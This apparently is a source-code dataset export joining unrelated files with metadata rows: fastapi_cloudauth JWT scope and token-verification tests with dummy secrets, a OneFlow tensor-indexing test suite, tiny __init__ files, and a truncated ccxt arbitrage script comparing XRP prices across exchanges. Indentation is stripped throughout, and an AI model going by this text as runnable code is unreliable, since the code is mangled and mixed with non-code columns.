scope_key = "dummy key"
http_auth = HTTPAuthorizationCredentials(scheme="a", credentials="dummy-token",)
# trivial scope
verifier = ScopedJWKsVerifier(
jwks=JWKS(keys=[]), scope_key=scope_key, scope_name=None
)
assert verifier._verify_scope(http_auth)
# invalid incoming scope format
mocker.patch(
"fastapi_cloudauth.verification.jwt.get_unverified_claims",
return_value={"dummy key": 100},
)
verifier = ScopedJWKsVerifier(
jwks=JWKS(keys=[]), scope_key=scope_key, scope_name=["read:test"]
)
with pytest.raises(HTTPException):
verifier._verify_scope(http_auth)
# auto_error is False
verifier = ScopedJWKsVerifier(
jwks=JWKS(keys=[]),
scope_key=scope_key,
scope_name=["read:test"],
auto_error=False,
)
assert not verifier._verify_scope(http_auth)
@pytest.mark.unittest
@pytest.mark.parametrize(
"scopes", ["xxx:xxx yyy:yyy", ["xxx:xxx", "yyy:yyy"]],
)
def test_scope_match_all(mocker, scopes):
scope_key = "dummy key"
http_auth = HTTPAuthorizationCredentials(scheme="a", credentials="dummy-token",)
# check scope logic
mocker.patch(
"fastapi_cloudauth.verification.jwt.get_unverified_claims",
return_value={"dummy key": scopes},
)
jwks = JWKS(keys=[])
# api scope < user scope
verifier = ScopedJWKsVerifier(
scope_name=["xxx:xxx"], jwks=jwks, scope_key=scope_key, auto_error=False,
)
assert verifier._verify_scope(http_auth)
# api scope == user scope (in order)
verifier = ScopedJWKsVerifier(
scope_name=["xxx:xxx", "yyy:yyy"],
jwks=jwks,
scope_key=scope_key,
auto_error=False,
)
assert verifier._verify_scope(http_auth)
# api scope == user scope (disorder)
verifier = ScopedJWKsVerifier(
scope_name=["yyy:yyy", "xxx:xxx"],
jwks=jwks,
scope_key=scope_key,
auto_error=False,
)
assert verifier._verify_scope(http_auth)
# api scope > user scope
verifier = ScopedJWKsVerifier(
scope_name=["yyy:yyy", "xxx:xxx", "zzz:zzz"],
jwks=jwks,
scope_key=scope_key,
auto_error=False,
)
assert not verifier._verify_scope(http_auth)
@pytest.mark.unittest
@pytest.mark.parametrize(
"scopes", ["xxx:xxx yyy:yyy", ["xxx:xxx", "yyy:yyy"]],
)
def test_scope_match_any(mocker, scopes):
scope_key = "dummy key"
http_auth = HTTPAuthorizationCredentials(scheme="a", credentials="dummy-token",)
# check scope logic
mocker.patch(
"fastapi_cloudauth.verification.jwt.get_unverified_claims",
return_value={"dummy key": scopes},
)
jwks = JWKS(keys=[])
# api scope < user scope
verifier = ScopedJWKsVerifier(
scope_name=["xxx:xxx"],
jwks=jwks,
scope_key=scope_key,
auto_error=False,
op=Operator._any,
)
assert verifier._verify_scope(http_auth)
# api scope == user scope (in order)
verifier = ScopedJWKsVerifier(
scope_name=["xxx:xxx", "yyy:yyy"],
op=Operator._any,
jwks=jwks,
scope_key=scope_key,
auto_error=False,
)
assert verifier._verify_scope(http_auth)
# api scope == user scope (disorder)
verifier = ScopedJWKsVerifier(
scope_name=["yyy:yyy", "xxx:xxx"],
op=Operator._any,
jwks=jwks,
scope_key=scope_key,
auto_error=False,
)
assert verifier._verify_scope(http_auth)
# api scope > user scope
verifier = ScopedJWKsVerifier(
scope_name=["yyy:yyy", "xxx:xxx", "zzz:zzz"],
op=Operator._any,
jwks=jwks,
scope_key=scope_key,
auto_error=False,
)
assert verifier._verify_scope(http_auth)
# api scope ^ user scope
verifier = ScopedJWKsVerifier(
scope_name=["zzz:zzz"],
op=Operator._any,
jwks=jwks,
scope_key=scope_key,
auto_error=False,
)
assert not verifier._verify_scope(http_auth)
@pytest.mark.unittest
def test_verify_token():
verifier = JWKsVerifier(jwks=JWKS(keys=[]))
verifier_no_error = JWKsVerifier(jwks=JWKS(keys=[]), auto_error=False)
# correct
token = jwt.encode(
{
"sub": "dummy-ID",
"exp": datetime.utcnow() + timedelta(hours=10),
"iat": datetime.utcnow(),
},
"dummy_secret",
headers={"alg": "HS256", "typ": "JWT", "kid": "dummy-kid"},
)
verifier._verify_claims(HTTPAuthorizationCredentials(scheme="a", credentials=token))
verifier_no_error._verify_claims(
HTTPAuthorizationCredentials(scheme="a", credentials=token)
)
# token expired
token = jwt.encode(
{
"sub": "dummy-ID",
"exp": datetime.utcnow() - timedelta(hours=10), # 10h before
"iat": datetime.utcnow(),
},
"dummy_secret",
headers={"alg": "HS256", "typ": "JWT", "kid": "dummy-kid"},
)
e = _assert_verifier(token, verifier)
assert e.status_code == HTTP_401_UNAUTHORIZED and e.detail == messages.NOT_VERIFIED
_assert_verifier_no_error(token, verifier_no_error)
# token created at future
token = jwt.encode(
{
"sub": "dummy-ID",
"exp": datetime.utcnow() + timedelta(hours=10),
"iat": datetime.utcnow() + timedelta(hours=10),
},
"dummy_secret",
headers={"alg": "HS256", "typ": "JWT", "kid": "dummy-kid"},
)
e = _assert_verifier(token, verifier)
assert e.status_code == HTTP_401_UNAUTHORIZED and e.detail == messages.NOT_VERIFIED
_assert_verifier_no_error(token, verifier_no_error)
# invalid format
token = jwt.encode(
{
"sub": "dummy-ID",
"exp": datetime.utcnow() + timedelta(hours=10),
"iat": datetime.utcnow(),
},
"dummy_secret",
headers={"alg": "HS256", "typ": "JWT", "kid": "dummy-kid"},
)
token = token.split(".")[0]
e = _assert_verifier(token, verifier)
assert (
e.status_code == HTTP_401_UNAUTHORIZED
and e.detail == messages.NOT_AUTHENTICATED
)
_assert_verifier_no_error(token, verifier_no_error)
| 30.534351
| 88
| 0.6555
| 914
| 8,000
| 5.482495
| 0.122538
| 0.043105
| 0.038914
| 0.064259
| 0.86829
| 0.854919
| 0.832169
| 0.790261
| 0.767511
| 0.738176
| 0
| 0.00645
| 0.22475
| 8,000
| 261
| 89
| 30.651341
| 0.801516
| 0.05325
| 0
| 0.61244
| 0
| 0
| 0.102992
| 0.029653
| 0
| 0
| 0
| 0
| 0.119617
| 1
| 0.023923
| false
| 0
| 0.043062
| 0
| 0.066986
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
02d586abc0fb8ce87c143a54d0c89a27cf9bc60c
| 17,478
|
py
|
Python
|
python/oneflow/test/tensor/test_tensor_indexing.py
|
Panlichen/oneflow
|
ad93c69c9932e5515aa31fb7f157073708810a3d
|
[
"Apache-2.0"
] | null | null | null |
python/oneflow/test/tensor/test_tensor_indexing.py
|
Panlichen/oneflow
|
ad93c69c9932e5515aa31fb7f157073708810a3d
|
[
"Apache-2.0"
] | null | null | null |
python/oneflow/test/tensor/test_tensor_indexing.py
|
Panlichen/oneflow
|
ad93c69c9932e5515aa31fb7f157073708810a3d
|
[
"Apache-2.0"
] | 1
|
2021-12-15T02:14:49.000Z
|
2021-12-15T02:14:49.000Z
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import unittest
from oneflow.test_utils.test_util import GenArgList
from collections import OrderedDict
from oneflow.test_utils.automated_test_util import *
import numpy as np
import oneflow as flow
import oneflow.unittest
def _test_numpy_scalar_indexing(test_case, numpy_x, np_scalar):
x = flow.Tensor(numpy_x)
# basic_slice
test_case.assertTrue(np.allclose(numpy_x[np_scalar(1)], x[np_scalar(1)].numpy()))
test_case.assertTrue(np.allclose(numpy_x[np_scalar(-2)], x[np_scalar(-2)].numpy()))
test_case.assertTrue(
np.allclose(
numpy_x[np_scalar(0), np_scalar(1)], x[np_scalar(0), np_scalar(1)].numpy()
)
)
test_case.assertTrue(
np.allclose(
numpy_x[(np_scalar(0), np_scalar(1))],
x[(np_scalar(0), np_scalar(1))].numpy(),
)
)
test_case.assertTrue(
np.allclose(
numpy_x[((np_scalar(0), np_scalar(1)))],
x[((np_scalar(0), np_scalar(1)))].numpy(),
)
)
def _test_numpy_scalar_advance_indexing(test_case, numpy_x, np_scalar):
x = flow.Tensor(numpy_x)
# advance indexing
test_case.assertTrue(
np.allclose(
numpy_x[[np_scalar(0), np_scalar(1)]],
x[[np_scalar(0), np_scalar(1)]].numpy(),
)
)
test_case.assertTrue(
np.allclose(
numpy_x[[np_scalar(0), np_scalar(1)], [np_scalar(1), np_scalar(0)]],
x[[np_scalar(0), np_scalar(1)], [np_scalar(1), np_scalar(0)]].numpy(),
)
)
test_case.assertTrue(
np.allclose(
numpy_x[
[
[np_scalar(0), np_scalar(1)],
[np_scalar(0), np_scalar(1)],
[np_scalar(1), np_scalar(0)],
]
],
x[
[
[np_scalar(0), np_scalar(1)],
[np_scalar(0), np_scalar(1)],
[np_scalar(1), np_scalar(0)],
]
].numpy(),
)
)
def _test_basic_slice(test_case, numpy_x):
x = flow.tensor(numpy_x)
test_case.assertTrue(np.allclose(numpy_x[1], x[1].numpy()))
test_case.assertTrue(np.allclose(numpy_x[-2], x[-2].numpy()))
test_case.assertTrue(np.allclose(numpy_x[0, 1], x[0, 1].numpy()))
test_case.assertTrue(np.allclose(numpy_x[(0, 1)], x[(0, 1)].numpy()))
test_case.assertTrue(np.allclose(numpy_x[((0, 1))], x[((0, 1))].numpy()))
test_case.assertTrue(np.allclose(numpy_x[None], x[None].numpy()))
test_case.assertTrue(np.allclose(numpy_x[True], x[True].numpy()))
test_case.assertTrue(np.allclose(numpy_x[1, None], x[1, None].numpy()))
test_case.assertTrue(np.allclose(numpy_x[1, None, 1], x[1, None, 1].numpy()))
test_case.assertTrue(
np.allclose(numpy_x[1, None, None, 1], x[1, None, None, 1].numpy())
)
test_case.assertTrue(np.allclose(numpy_x[:], x[:].numpy()))
test_case.assertTrue(np.allclose(numpy_x[:1], x[:1].numpy()))
test_case.assertTrue(np.allclose(numpy_x[0:1], x[0:1].numpy()))
test_case.assertTrue(np.allclose(numpy_x[-2:-1], x[-2:-1].numpy()))
test_case.assertTrue(np.allclose(numpy_x[2:100:200], x[2:100:200].numpy()))
test_case.assertTrue(np.allclose(numpy_x[0:2, ...], x[0:2, ...].numpy()))
test_case.assertTrue(np.allclose(numpy_x[0:2, ..., 1], x[0:2, ..., 1].numpy()))
test_case.assertTrue(
np.allclose(numpy_x[0:2, ..., 1, 1], x[0:2, ..., 1, 1].numpy())
)
test_case.assertTrue(np.allclose(numpy_x[0:4:2, ...], x[0:4:2, ...].numpy()))
test_case.assertTrue(
np.allclose(numpy_x[0:2, None, ..., True], x[0:2, None, ..., True].numpy())
)
test_case.assertTrue(
np.allclose(numpy_x[None, ..., 0:4:2, True], x[None, ..., 0:4:2, True].numpy())
)
test_case.assertTrue(np.allclose(numpy_x[False, ...], x[False, ...].numpy()))
test_case.assertTrue(
np.allclose(numpy_x[False, True, ...], x[False, True, ...].numpy())
)
test_case.assertTrue(
np.allclose(numpy_x[True, ..., False, True], x[True, ..., False, True].numpy())
)
test_case.assertTrue(
np.allclose(
numpy_x[True, None, ..., False, True],
x[True, None, ..., False, True].numpy(),
)
)
test_case.assertTrue(
np.allclose(
numpy_x[True, 1, ..., False, True], x[True, 1, ..., False, True].numpy()
)
)
def _test_advanced_indexing(test_case, numpy_x):
x = flow.tensor(numpy_x)
test_case.assertTrue(np.allclose(numpy_x[[0, 1]], x[[0, 1]].numpy()))
test_case.assertTrue(
np.allclose(numpy_x[[0, 1], [1, 0]], x[[0, 1], [1, 0]].numpy())
)
test_case.assertTrue(
np.allclose(
numpy_x[[[0, 1], [0, 1], [1, 0]]], x[[[0, 1], [0, 1], [1, 0]]].numpy()
)
)
test_case.assertTrue(np.allclose(numpy_x[[[0], [1]]], x[[[0], [1]]].numpy()))
test_case.assertTrue(
np.allclose(
numpy_x[[[[0], [1]], [[0], [1]], [0, 1]]],
x[[[[0], [1]], [[0], [1]], [0, 1]]].numpy(),
)
)
test_case.assertTrue(
np.allclose(
numpy_x[[[[0, 1], [1, 1]], [[0, 0], [1, 1]], [0, 1]]],
x[[[[0, 1], [1, 1]], [[0, 0], [1, 1]], [0, 1]]].numpy(),
)
)
# Tensor index
test_case.assertTrue(
np.allclose(
numpy_x[np.array([0, 1]), np.array([1, 0])],
x[flow.tensor([0, 1]), flow.tensor([1, 0])].numpy(),
)
)
test_case.assertTrue(
np.allclose(
numpy_x[:, np.array([[0, 1], [1, 1]]), np.array([[1, 0], [1, 1]])],
x[:, flow.tensor([[0, 1], [1, 1]]), flow.tensor([[1, 0], [1, 1]]),].numpy(),
)
)
# mask tensor index
mask = np.random.rand(numpy_x.shape[0], numpy_x.shape[1]).astype(np.float32)
y = flow.tensor(mask)
test_case.assertTrue(np.allclose(numpy_x[mask > 0.5], x[y > 0.5].numpy()))
test_case.assertTrue(np.allclose(numpy_x[mask > 0.5, 1], x[y > 0.5, 1].numpy()))
test_case.assertTrue(np.allclose(numpy_x[mask > 0], x[y > 0].numpy()))
test_case.assertTrue(np.allclose(numpy_x[mask > 0, 1], x[y > 0, 1].numpy()))
test_case.assertTrue(np.allclose(numpy_x[mask > 1], x[y > 1].numpy()))
test_case.assertTrue(np.allclose(numpy_x[mask > 1, 1], x[y > 1, 1].numpy()))
mask = np.random.rand(*numpy_x.shape).astype(np.float32)
y = flow.tensor(mask)
test_case.assertTrue(np.allclose(numpy_x[mask > 0.5], x[y > 0.5].numpy()))
test_case.assertTrue(np.allclose(numpy_x[mask > 0], x[y > 0].numpy()))
test_case.assertTrue(np.allclose(numpy_x[mask > 1], x[y > 1].numpy()))
def _test_advanced_indexing_array(test_case, numpy_x, dtype):
x = flow.tensor(numpy_x)
idx = np.array([0, 1], dtype=dtype)
test_case.assertTrue(np.allclose(numpy_x[idx], x[idx].numpy()))
idx1 = np.array([0, 1], dtype=dtype)
idx2 = np.array([1, 0], dtype=dtype)
test_case.assertTrue(np.allclose(numpy_x[idx1, idx2], x[idx1, idx2].numpy()))
idx = np.array([[0, 1], [0, 1], [1, 0]], dtype=dtype)
test_case.assertTrue(np.allclose(numpy_x[idx, :, :], x[idx, :, :].numpy()))
test_case.assertTrue(np.allclose(numpy_x[idx, idx, :], x[idx, idx, :].numpy()))
test_case.assertTrue(np.allclose(numpy_x[idx, idx, idx], x[idx, idx, idx].numpy()))
idx1 = np.array([[1, 0, 1], [1, 1, 0]])
idx2 = np.array([[0], [1]])
test_case.assertTrue(
np.allclose(numpy_x[:, idx1, :, idx2].shape, x[:, idx1, :, idx2].shape)
)
test_case.assertTrue(
np.allclose(numpy_x[:, idx1, 1, idx2].shape, x[:, idx1, 1, idx2].shape)
)
test_case.assertTrue(
np.allclose(numpy_x[idx1, :, idx2, :].shape, x[idx1, :, idx2, :].shape)
)
test_case.assertTrue(
np.allclose(numpy_x[:, idx1, idx2, :].shape, x[:, idx1, idx2, :].shape)
)
def _test_combining_indexing(test_case, numpy_x):
x = flow.tensor(numpy_x)
test_case.assertTrue(
np.allclose(numpy_x[[0, 1], 1:2, [1, 0]], x[[0, 1], 1:2, [1, 0]].numpy())
)
test_case.assertTrue(
np.allclose(numpy_x[:, [0, 1], [1, 0]], x[:, [0, 1], [1, 0]].numpy())
)
test_case.assertTrue(np.allclose(numpy_x[:, [0, 1], 1], x[:, [0, 1], 1].numpy()))
test_case.assertTrue(
np.allclose(numpy_x[..., [0, 1], 1, [1, 0]], x[..., [0, 1], 1, [1, 0]].numpy())
)
def _test_mask_getitem(test_case, numpy_x):
x = flow.tensor(numpy_x)
mask = np.random.rand(*numpy_x.shape).astype(np.float32)
y = flow.tensor(mask)
test_case.assertTrue(np.allclose(numpy_x[mask > 0.5], x[y > 0.5].numpy()))
test_case.assertTrue(np.allclose(numpy_x[mask > 1.0], x[y > 1.0].numpy()))
mask = np.random.rand(numpy_x.shape[0]).astype(np.float32)
y = flow.tensor(mask)
test_case.assertTrue(np.allclose(numpy_x[mask > 0.5], x[y > 0.5].numpy()))
test_case.assertTrue(np.allclose(numpy_x[mask > 1.0], x[y > 1.0].numpy()))
test_case.assertTrue(np.allclose(numpy_x[mask > 0.5, 1], x[y > 0.5, 1].numpy()))
test_case.assertTrue(np.allclose(numpy_x[mask > 1.0, 1], x[y > 1.0, 1].numpy()))
def _test_mask_setitem(test_case, numpy_x):
x = flow.tensor(numpy_x)
# mask tensor index
mask = np.random.rand(*numpy_x.shape).astype(np.float32)
y = flow.tensor(mask)
# broadcast set
x[y > 0.5] = 1.0
numpy_x[mask > 0.5] = 1.0
test_case.assertTrue(np.allclose(numpy_x, x.numpy()))
# elementwise set
update = np.random.randn((mask > 0.5).sum()).astype(np.float32)
tensor_update = flow.tensor(update)
x[y > 0.5] = tensor_update
numpy_x[mask > 0.5] = update
test_case.assertTrue(np.allclose(numpy_x, x.numpy()))
# empty mask
x[y > 1.0] = 1.0
numpy_x[mask > 1.0] = 1.0
test_case.assertTrue(np.allclose(numpy_x, x.numpy()))
def _test_list_indexing_using_scalar_tensor(test_case, dtype):
y = np.random.randint(0, 100, size=100)
for i in range(len(y)):
x = flow.tensor(i, dtype=dtype)
test_case.assertEqual(y[i], y[x])
@flow.unittest.skip_unless_1n1d()
class TestTensorIndexing(flow.unittest.TestCase):
def test_basic_slice(test_case):
numpy_x = np.arange(0, 60, 1).reshape([3, 4, 5]).astype(np.float32)
_test_basic_slice(test_case, numpy_x)
numpy_x = np.arange(0, 360, 1).reshape([3, 4, 5, 6]).astype(np.float32)
_test_basic_slice(test_case, numpy_x)
numpy_x = np.arange(0, 720, 1).reshape([8, 9, 10]).astype(np.float32)
_test_basic_slice(test_case, numpy_x)
def test_advanced_indexing(test_case):
numpy_x = np.arange(0, 60, 1).reshape([3, 4, 5]).astype(np.float32)
_test_advanced_indexing(test_case, numpy_x)
numpy_x = np.arange(0, 360, 1).reshape([3, 4, 5, 6]).astype(np.float32)
_test_advanced_indexing(test_case, numpy_x)
numpy_x = np.arange(0, 720, 1).reshape([8, 9, 10]).astype(np.float32)
_test_advanced_indexing(test_case, numpy_x)
def test_advanced_indexing_array(test_case):
numpy_x = np.arange(0, 60, 1).reshape([3, 2, 2, 5]).astype(np.float32)
_test_advanced_indexing_array(test_case, numpy_x, np.int32)
_test_advanced_indexing_array(test_case, numpy_x, np.int64)
numpy_x = np.arange(0, 360, 1).reshape([3, 4, 5, 6]).astype(np.float32)
_test_advanced_indexing_array(test_case, numpy_x, np.int32)
_test_advanced_indexing_array(test_case, numpy_x, np.int64)
numpy_x = np.arange(0, 720, 1).reshape([5, 8, 9, 2]).astype(np.float32)
_test_advanced_indexing_array(test_case, numpy_x, np.int32)
_test_advanced_indexing_array(test_case, numpy_x, np.int64)
def test_combining_indexing(test_case):
numpy_x = np.arange(0, 60, 1).reshape([3, 4, 5]).astype(np.float32)
_test_combining_indexing(test_case, numpy_x)
numpy_x = np.arange(0, 360, 1).reshape([3, 4, 5, 6]).astype(np.float32)
_test_combining_indexing(test_case, numpy_x)
numpy_x = np.arange(0, 720, 1).reshape([8, 9, 10]).astype(np.float32)
_test_combining_indexing(test_case, numpy_x)
def test_numpy_scalar_indexing(test_case):
for np_scalar in [np.int8, np.int16, np.int32, np.int64]:
numpy_x = np.arange(0, 60, 1).reshape([3, 4, 5]).astype(np.float32)
_test_numpy_scalar_indexing(test_case, numpy_x, np_scalar)
numpy_x = np.arange(0, 360, 1).reshape([3, 4, 5, 6]).astype(np.float32)
_test_numpy_scalar_indexing(test_case, numpy_x, np_scalar)
numpy_x = np.arange(0, 720, 1).reshape([8, 9, 10]).astype(np.float32)
_test_numpy_scalar_indexing(test_case, numpy_x, np_scalar)
# TODO: add np.int16 when advance indexing supports np.int16 mapping
for np_scalar in [np.int32, np.int64]:
numpy_x = np.arange(0, 60, 1).reshape([3, 4, 5]).astype(np.float32)
_test_numpy_scalar_advance_indexing(test_case, numpy_x, np_scalar)
numpy_x = np.arange(0, 360, 1).reshape([3, 4, 5, 6]).astype(np.float32)
_test_numpy_scalar_advance_indexing(test_case, numpy_x, np_scalar)
numpy_x = np.arange(0, 720, 1).reshape([8, 9, 10]).astype(np.float32)
_test_numpy_scalar_advance_indexing(test_case, numpy_x, np_scalar)
def test_mask_getitem(test_case):
numpy_x = np.arange(0, 60, 1).reshape([3, 4, 5]).astype(np.float32)
_test_mask_getitem(test_case, numpy_x)
numpy_x = np.arange(0, 360, 1).reshape([3, 4, 5, 6]).astype(np.float32)
_test_mask_getitem(test_case, numpy_x)
numpy_x = np.arange(0, 720, 1).reshape([8, 9, 10]).astype(np.float32)
_test_mask_getitem(test_case, numpy_x)
numpy_x = np.arange(0, 27, 1).reshape(3, 3, 3)
x = flow.tensor(numpy_x)
test_case.assertTrue(
np.allclose(
numpy_x[[False, True, False], 1], x[[False, True, False], 1].numpy()
)
)
test_case.assertTrue(
np.allclose(
numpy_x[[False, True, False], [True, False, False]],
x[[False, True, False], [True, False, False]].numpy(),
)
)
def test_mask_setitem(test_case):
numpy_x = np.arange(0, 60, 1).reshape([3, 4, 5]).astype(np.float32)
_test_mask_setitem(test_case, numpy_x)
numpy_x = np.arange(0, 360, 1).reshape([3, 4, 5, 6]).astype(np.float32)
_test_mask_setitem(test_case, numpy_x)
numpy_x = np.arange(0, 720, 1).reshape([8, 9, 10]).astype(np.float32)
_test_mask_setitem(test_case, numpy_x)
def test_advanced_indexing_with_scalar_index(test_case):
index = flow.tensor([0, 2])
x = flow.randn(5)
x[index[0]] = 1
test_case.assertTrue(np.allclose(x[0].numpy(), 1))
def test_list_indexing_using_scalar_tensor(test_case):
arg_dict = OrderedDict()
arg_dict["function_test"] = [
_test_list_indexing_using_scalar_tensor,
]
arg_dict["dtype"] = [flow.uint8, flow.int8, flow.int32, flow.int64]
for arg in GenArgList(arg_dict):
arg[0](test_case, *arg[1:])
@autotest(n=3, auto_backward=False)
def test_advanced_indexing_with_0_size_tensor(test_case):
device = random_device()
data = torch.arange(8).reshape(2, 2, 2).to(device)
ranges = []
ranges.append(torch.ones(0, 1).to(torch.int64))
ranges.append(torch.zeros(1, 3).to(torch.int64))
res = data[ranges]
return res
@autotest(n=1)
def test_dataloader_indexing_with_1_dim_tensor(test_case):
device = random_device()
x = random_tensor(ndim=1, dim0=512).to(device)
batch_data = list()
for i in range(512):
batch_data.append(x[i])
return torch.stack(batch_data)
@unittest.skipIf(os.getenv("ONEFLOW_TEST_CPU_ONLY"), "only test cpu cases")
def test_indecies_on_different_devices(test_case):
x = flow.ones(3, 10)
y = flow.ones(3, 10, device=flow.device("cuda:0"))
x_idx = [flow.tensor([1, 2]), flow.tensor([2, 0], device=flow.device("cuda:0"))]
y_idx = [flow.tensor([1, 2], device=flow.device("cuda:0")), flow.tensor([2, 0])]
test_case.assertTrue(np.allclose(x[x_idx].numpy(), np.array([1, 1])))
test_case.assertTrue(np.allclose(y[y_idx].numpy(), np.array([1, 1])))
@unittest.skipIf(os.getenv("ONEFLOW_TEST_CPU_ONLY"), "only test cpu cases")
class TestTensorIndexingMultiGpu(flow.unittest.TestCase):
@flow.unittest.skip_unless_1n2d()
def test_indecies_on_different_devices(test_case):
x = flow.ones(3, 10, device=flow.device("cuda:0"))
idx = [flow.tensor([1, 2], device=flow.device("cuda:1")), flow.tensor([2, 0])]
test_case.assertTrue(np.allclose(x[idx].numpy(), np.array([1, 1])))
if __name__ == "__main__":
unittest.main()
| 38.328947
| 88
| 0.605847
| 2,685
| 17,478
| 3.736313
| 0.072253
| 0.091507
| 0.141746
| 0.157496
| 0.818282
| 0.781699
| 0.757675
| 0.74053
| 0.720594
| 0.662879
| 0
| 0.05558
| 0.215585
| 17,478
| 455
| 89
| 38.413187
| 0.676149
| 0.043941
| 0
| 0.391429
| 0
| 0
| 0.008147
| 0.002516
| 0
| 0
| 0
| 0.002198
| 0.228571
| 1
| 0.062857
| false
| 0
| 0.022857
| 0
| 0.097143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b828f504bb7218181714fcc165a33553c102dccf
| 32
|
py
|
Python
|
howcani/__init__.py
|
rahuldshetty/howcani
|
974e129c6edd97a0c234e6c2f1c4c084fecd8584
|
[
"MIT"
] | null | null | null |
howcani/__init__.py
|
rahuldshetty/howcani
|
974e129c6edd97a0c234e6c2f1c4c084fecd8584
|
[
"MIT"
] | null | null | null |
howcani/__init__.py
|
rahuldshetty/howcani
|
974e129c6edd97a0c234e6c2f1c4c084fecd8584
|
[
"MIT"
] | null | null | null |
from howcani.howcani import main
| 32
| 32
| 0.875
| 5
| 32
| 5.6
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09375
| 32
| 1
| 32
| 32
| 0.965517
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b8295b666548c32b44eff3d7c4e892d875c6643a
| 94
|
py
|
Python
|
mtsoo/__init__.py
|
RunningPhoton/mfea-ii
|
9bf6520547a1c1972b62985f65a744471f1f1b00
|
[
"MIT"
] | 35
|
2019-12-11T10:23:12.000Z
|
2021-12-08T05:50:24.000Z
|
mfea_ii_lib/__init__.py
|
minhquang4334/mfeaii-ann-rl
|
d954ef4fdb3c39a4d3f3eb57d445c99bee46f7cc
|
[
"MIT"
] | null | null | null |
mfea_ii_lib/__init__.py
|
minhquang4334/mfeaii-ann-rl
|
d954ef4fdb3c39a4d3f3eb57d445c99bee46f7cc
|
[
"MIT"
] | 11
|
2019-12-11T10:57:16.000Z
|
2021-07-21T08:51:31.000Z
|
from tqdm import trange
from .tasks import *
from .operators import *
from .helpers import *
| 15.666667
| 24
| 0.755319
| 13
| 94
| 5.461538
| 0.538462
| 0.28169
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.180851
| 94
| 5
| 25
| 18.8
| 0.922078
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b8367d9ed8e98005579206f5d3420d80094a1915
| 13,637
|
py
|
Python
|
app/module/exchangess/calculation.py
|
kamijiseiya/AbidoraKun
|
20fc5dc19779b939b150c6a4ac3ac2a601ba48c8
|
[
"MIT"
] | 2
|
2018-05-02T23:46:14.000Z
|
2018-05-15T02:02:04.000Z
|
app/module/exchangess/calculation.py
|
kamijiseiya/cash-cow
|
20fc5dc19779b939b150c6a4ac3ac2a601ba48c8
|
[
"MIT"
] | 58
|
2018-05-01T05:02:18.000Z
|
2018-08-03T14:41:29.000Z
|
app/module/exchangess/calculation.py
|
kamijiseiya/cash-cow
|
20fc5dc19779b939b150c6a4ac3ac2a601ba48c8
|
[
"MIT"
] | null | null | null |
import time
import ccxt
import json
class CALCULATION:
"""取引所間の通貨差額を求めるクラス"""
def difference_xrp_btc(self):
"""取引所間でのxrp差額を求めるメソッド
(bitbank,binance,coinex)"""
while True:
try:
bitbanks = ccxt.bitbank()
bitbank_btc_jpy = bitbanks.fetch_ticker('BTC/JPY')
bitbank_xrp_jpy = bitbanks.fetch_ticker('XRP/JPY')
bitbank_xrp_btc_bid = bitbank_xrp_jpy.get("bid") / bitbank_btc_jpy.get("ask")
bitbank_xrp_btc_ask = bitbank_xrp_jpy.get("ask") / bitbank_btc_jpy.get("bid")
# binanceからXRP/BTC通貨情報取得
binances = ccxt.binance()
binance_xrp_btc = binances.fetch_ticker('XRP/BTC')
# coinexからXRP/BTC通貨情報取得
coinex = ccxt.coinex()
coinex_xrp_btc = coinex.fetch_ticker('XRP/BTC')
# bitbankとbinance間の差額
profit_bitbank_binance = ((binance_xrp_btc.get("bid") - bitbank_xrp_btc_ask) * self) * bitbank_btc_jpy.get("bid")
profit_binance_bitbank = ((bitbank_xrp_btc_bid - binance_xrp_btc.get("ask")) * self) * bitbank_btc_jpy.get("bid")
# bitbankとcoinex間の差額
profit_bitbank_coinex = ((coinex_xrp_btc.get("bid") - bitbank_xrp_btc_ask) * self) * bitbank_btc_jpy.get("bid")
profit_coinex_bitbank = ((bitbank_xrp_btc_bid - coinex_xrp_btc.get("ask")) * self) * bitbank_btc_jpy.get("bid")
# binanceとcoinex間の差額
profit_binance_coinex = ((coinex_xrp_btc.get("bid") - binance_xrp_btc.get("ask")) * self) * bitbank_btc_jpy.get("bid")
profit_coinex_binance = ((binance_xrp_btc.get("bid") - coinex_xrp_btc.get("ask")) * self) * bitbank_btc_jpy.get("bid")
#'XRPを取引した場合の最大利益(jpy):'
maxvalue = max([profit_bitbank_binance, profit_binance_bitbank, profit_bitbank_coinex,
profit_coinex_bitbank, profit_binance_coinex, profit_coinex_binance])
